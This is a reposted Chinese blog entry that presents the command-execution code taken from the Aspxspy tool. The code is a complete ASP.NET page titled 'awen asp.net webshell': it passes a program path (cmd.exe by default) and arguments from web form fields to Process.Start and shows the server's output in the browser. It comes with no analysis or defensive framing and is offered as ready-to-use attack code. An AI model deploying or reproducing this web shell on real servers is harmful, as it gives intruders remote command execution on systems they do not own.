码迷,mamicode.com
首页 > Web开发 > 详细

Aspxspy中提取执行cmd命令的代码

时间:2016-01-06 12:14:20      阅读:198      评论:0      收藏:0      [点我收藏+]

标签:false

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<script Language="c#" runat="server">
protected void FbhN(object sender,EventArgs e)
{
try
{
Process ahAE=new Process();
ahAE.StartInfo.FileName=kusi.Value;
ahAE.StartInfo.Arguments=bkcm.Value;
ahAE.StartInfo.UseShellExecute=false;
ahAE.StartInfo.RedirectStandardInput=true;
ahAE.StartInfo.RedirectStandardOutput=true;
ahAE.StartInfo.RedirectStandardError=true;
ahAE.Start();
string Uoc=ahAE.StandardOutput.ReadToEnd();
Uoc=Uoc.Replace("<","&lt;");
Uoc=Uoc.Replace(">","&gt;");
Uoc=Uoc.Replace("\r\n","<br>");
tnQRF.Visible=true;
tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
}
catch(Exception error)
{
Response.Write(error.Message);
}
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title> 
</HEAD>
<body >
<form id="cmd" method="post" runat="server"> 
<div runat="server" id="vIac">

 <p>路径:<br/>

 <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>

 </p>

 参数:<br/>

 <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>

 <div id="tnQRF" runat="server" visible="false" enableviewstate="false">

 </div>
</div>
</form>
</body>
</HTML>


本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1731956

Aspxspy中提取执行cmd命令的代码

标签:false

原文地址:http://0x007.blog.51cto.com/6330498/1731956

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!